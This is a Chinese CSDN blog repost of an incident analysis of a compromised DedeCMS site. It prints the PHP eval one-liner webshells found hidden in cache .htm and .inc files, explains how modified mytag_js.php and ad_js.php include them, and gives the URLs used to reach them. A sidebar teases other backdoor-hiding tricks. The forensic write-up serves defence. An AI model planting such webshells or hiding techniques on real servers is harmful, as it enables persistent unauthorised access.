一种奇特的DEDE隐藏后门办法

最新推荐文章于 2023-04-18 23:33:10 发布
最新推荐文章于 2023-04-18 23:33:10 发布
阅读量2.7k 收藏
点赞数
分类专栏: dede安全防毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forest_fire/article/details/50944399
版权
? 15:24 / 28

一种奇特的DEDE隐藏后门办法

单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.

为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?

无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:

1
{ dede : php } file_put_contents (90sec.php,' & lt ; ? php eval ( $ _POST [ guige ] ) ; ? & gt ;) ; { / dede : php }

 

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

1
2
3
4
& lt ; !
 
document . write (dedecmsisok & lt ; ? php @ eval ( $ _POST [ cmd ] ) ; ? & gt ;) ;
& gt ;

 

 

 

1
2
3
4
5
& lt ; !
 
document . write (& lt ; ? php $ fp = @ fopen (av . php, a) ; @ fwrite ( $ fp , & lt ; ? php eval ( $ _POST [ 110 ] ) ? & gt ; axxxxx) ; echo OK; @ fclose ( $ fp ) ; ? & gt ;) ;
 
& gt ;

 

 

 

1
2
3
& lt ; !
document . write (& lt ; ? php echo dedecms 5.7 0day & lt ; br & gt ; guige , 90sec.org; @ preg_replace (/ [ copyright ] / e, $ _REQUEST [ 'guige' ] ,error) ; ? & gt ;) ;
& gt ;

 

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时 间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

dedecms奇特webshell后门

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改 plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话 了.

http://www.91ri.org /plus/mytag_js.php?id=1208

http://www.91ri.org /plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

不怎么懂php,所以分析可能有差错的地方,欢迎指正!

link:http://www.nxadmin.com/penetration/1168.html

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。

 

admin

admin

作者

本站的投稿邮箱:tougao#91ri.org 你喜欢我们吗?帮我们点个广告吧亲~ :P

  • 还没有评论,沙发等你来抢
帐号管理
刘园园 
 
             
 
             
 
              
 
                分享到: 
              
 
               
              
 
             
 
            
 
            
91Ri.org正在使用多说
 
            
 
             
 
            
 
           
 
          
 
         
 
        
 
       
 
      
 
     
 
    
 
   
 
  
 
 
 
 
 


                

        

        

    

  


    

      

        

            

              
                
                  北方的刀郎
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
PHP WebShell 免杀

				
			

			

				

					悦分享
				

				

					08-01
					
					6038
					
				

			

		

		

			
				
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...

			
		

	



                

              
                



	

		

			

				
					
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

				
			

			

				

					weixin_46280935的博客
				

				

					09-10
					
					5555
					
				

			

		

		

			
				
Penetration_Testing_POC

搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。

Penetration_Testing_POC
	请善用搜索[Ctrl+F]查找
	IOT Device&Mobile Phone
	Web APP
	提权辅助相关
	PC
	tools-小工具集合
	文章/书籍/教程相关
	说明
请善用搜索[Ctrl+F]查找

IOT Device&Mobile Phone

天翼创维awifi路由器存在多处未授权访问漏

			
		

	



                


  
              

                


	

		

			

				
					
超强隐藏Shift后门

				
			

			

				

					11-13
				

			

		

		

			
				
服务器留后门的招。
1、国内的很多机器都是简体中文版,所以我们一般选择
运行安装中文版shift.bat
2、按5次以上shift键,待弹出窗口后
3、点击设置
4、再点击取消,出现小text框
5、输入密码 helloyun
6、再点击设置
7、点击开启任务管理器
看到什么了? 哈哈 成功了

退出3389


管理员根本无法发现这个后门

因为和按5次以上shift键 一样的画面

此后门无比强大。

如果是繁体的执行另外一个bat即可

			
		

	





	

		

			

				
					
寻找绝对隐蔽的后门办法 分享

				
			

			

				

					weixin_34363171的博客
				

				

					07-08
					
					413
					
				

			

		

		

			
				
nginx前几天nginx和IIS7都爆解析漏洞,搞了几个shell都 丢了,于是想寻找一个超级隐蔽的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上去 搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞,比如用变量作为包含对像,这只是针对程序,而非针对php下 include()这个函数.关于说这个函数把任意文件解析为p...

			
		

	



		

			
		



	

		

			

				
					
后门隐藏几个技巧

				
			

			

				

					paidx0
				

				

					05-01
					
					742
					
				

			

		

		

			
				
文章目录1、 attrib +s +h2、ADS数据流3、php环境变量包含4、不死马5、php.ini 后门6、关键字拆分,多文件包含
1、 attrib +s +h
Windows下即使开启了显示隐藏文件也是看不到的
attrib +s +h test.php
参数说明:

+r 设置只读属性
-r 取消只读属性

+a 设置存档属性
-a 取消存档属性

+s 设置系统属性
-s 取消系统属性

+h 设置隐藏属性
-h 取消隐藏属性

/s 显示目录下所有文件的属性
/d 将attrib和任意命令行

			
		

	





	

		

			

				
					
php隐藏后门,php如何将后门隐藏

				
			

			

				

					weixin_36427631的博客
				

				

					03-09
					
					147
					
				

			

		

		

			
				
php将后门隐藏的方法:首先创建系统隐藏文件,并创建ADS隐藏文件;然后通过包含文件的方式来使用jpd;最后将【index.php:shell.jpg】hex编码即可。php将后门隐藏的方法:一. attrib +s +h创建系统隐藏文件。attrib +s +a +r +h  /  attrib +s +h文件名查看隐藏文件二. 利用ADS隐藏文件NTFS交换数据流(Alternate Data...

			
		

	





	

		

			

				
					
DedeCMS 5.7 后门漏洞

				
			

			

				

					weixin_33895475的博客
				

				

					03-21
					
					592
					
				

			

		

		

			
				
简要描述:
DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码
详细说明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
漏洞证明:
shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...

			
		

	





	

		

			

				
					
dede批量Getshell

				
			

			

				

					10-31
				

			

		

		

			
				
标题中的“dede批量Getshell”指的是针对DEDECMS(织梦内容管理系统)的一种批量获取WebShell的操作。DEDECMS是一款广泛使用的PHP CMS,而Getshell则是网络安全领域中指利用漏洞在目标服务器上植入后门或者获取...

			
		

	





	

		

			

				
					
20年时候收集的一些信息安全岗面试题

				
			

			

				

					课嗨教育的专栏
				

				

					05-02
					
					7693
					
				

			

		

		

			
				
目录



面试一

面试二

面试三

更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客

面试一



 

个人介绍: 
 


	自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 
	
	
	1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 
	
	
	2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 
	
	
	3、业绩/成绩: 研究类:freebuff SRC I春秋...

			
		

	





	

		

			

				
					
利用metasploit渗透测试制作隐藏后门

				
			

			

				

					wr456wr的博客
				

				

					03-12
					
					706
					
				

			

		

		

			
				
利用metasploit渗透测试制作隐藏后门
@目录
1.	使用ms17-010永恒之蓝漏洞对win7进行渗透
2.	制作linux无文件木马程序
3.	使用脚本来进行自动创建后门


使用ms17-010永恒之蓝漏洞对win7进行渗透
已知win7ip:192.168.47.129
使用nmap对其进行开放端口探测



在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞

[+] 192.168.47.129:445    - Host is likely VULNERABLE t

			
		

	





	

		

			

				
					
超级隐蔽之后门技巧

				
			

			

				

					Ms08067安全实验室
				

				

					12-11
					
					271
					
				

			

		

		

			
				
在我们以往的渗透测试中,经常会遇到目标存在杀软,防火墙等防护软件的情况,导致我们的连接不稳定以及连接中断等情况,今天就教大家如何悄无声息的绕过层层防护开启一个愉快的渗透之旅,请抓紧坐好,...

			
		

	





	

		

			

				
					
必须吐槽下DEDE留的脑残后门

				
			

			

				

					福州 郑洪耕 程序类博客
				

				

					06-20
					
					1094
					
				

			

		

		

			
				
dedesql.class.php里有这么一段话:


if(isset($GLOBALS['arrs1']))
{
    $v1 = $v2 = '';
    for($i=0;isset($arrs1[$i]);$i++)
    {
        $v1 .= chr($arrs1[$i]);
    }
    for($i=0;isset($arrs2[$i]);$i++)

			
		

	





	

		

			

				
					
分析软件及其隐藏后门实验笔记

					
最新发布

				
			

			

				

					weixin_52034407的博客
				

				

					04-18
					
					691
					
				

			

		

		

			
				
分析软件及其隐藏后门实验笔记

			
		

	





	

		

			

				
					
dede amp lt php,一种奇特DEDE隐藏后门办法

				
			

			

				

					weixin_30160357的博客
				

				

					03-24
					
					173
					
				

			

		

		

			
				
一种独特的DEDE暗藏后门举措单位某站用的dedecms,即日被某黑阔getshell了,提交到了wooyun.为了复原黑阔入侵的本事,用鬼哥的getshell测试竟然没失利, 是不是getshell过一次,再次就不会失利呢?无法只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:Default{dede:php}file_put_...

			
		

	





	

		

			

				
					
DEDE如何去掉顶一下踩一下模块

				
			

			

				

					云霄网络工作室
				

				

					01-15
					
					1140
					
				

			

		

		

			
				
去掉article_article.htm模板文件里边的以下红色代码:

<div >
    <div class="diggbox digg_good" onmousemove="this.style.backgroundPosition='left bottom';" onmouseout="this.style.backgroundPosition='left top';...

			
		

	





	

		

			

				
					
入侵肉鸡,手动建立后门超级隐藏账户的方法

				
			

			

				

					fengling132的专栏
				

				

					05-09
					
					2473
					
				

			

		

		

			
				
1.首先利用系统用户建立一个管理员用户



2.利用1$用户远程登录服务器



3.利用注册表建立超级隐藏用户1$,并删除自身用户



4.利用1$登录服务器,结果显示administrator。




5.注册表的权限取消administrators



6.任务管理器,注销1$.



7.删除C:\Documents and Set

			
		

	





	

		

			

				
					
织梦模板DEDECMS栏目后台设置为显示,前端要隐藏怎么设置

				
			

			

				

					weixin_43717498的博客
				

				

					11-30
					
					787
					
				

			

		

		

			
				
如果织梦DEDECMS栏目后台设置隐藏,前台栏目如何显示
织梦97教大家用以下方式来实现:
<li {dede:field name=id runphp='yes'}(@me=='')?@me=" class='active'":@me='';{/dede:field} ><a href="{dede:global.cfg_basehost/}">首页</a>&...

			
		

	





	

		

			

				
					
dedecms官方后门获取你的站点信息

				
			

			

				

					赵一舟的博客
				

				

					03-09
					
					341
					
				

			

		

		

			
				
$offUrl = "http://new"."ver.a"."pi.de"."decms.com/index.php?c=info57&version={$cfg_version}&formurl={$nurl}&phpver={$phpv}&os={$sp_os}&mysqlver={$mysql_ver}{$add_query}";





			
		

	





	

		

			

				
					
ASP网页后门隐藏方法详解

				
			

			

				

					
				

			

		

		

			
				
后门隐藏是Web应用程序中的一种常见的安全问题。为了防止后门隐藏的攻击,我们需要采取一定的安全措施,例如使用防火墙和入侵检测系统、加密技术和定期更新和修复漏洞。此外,我们还需要加强用户的安全意识,教育...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
北方的刀郎

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值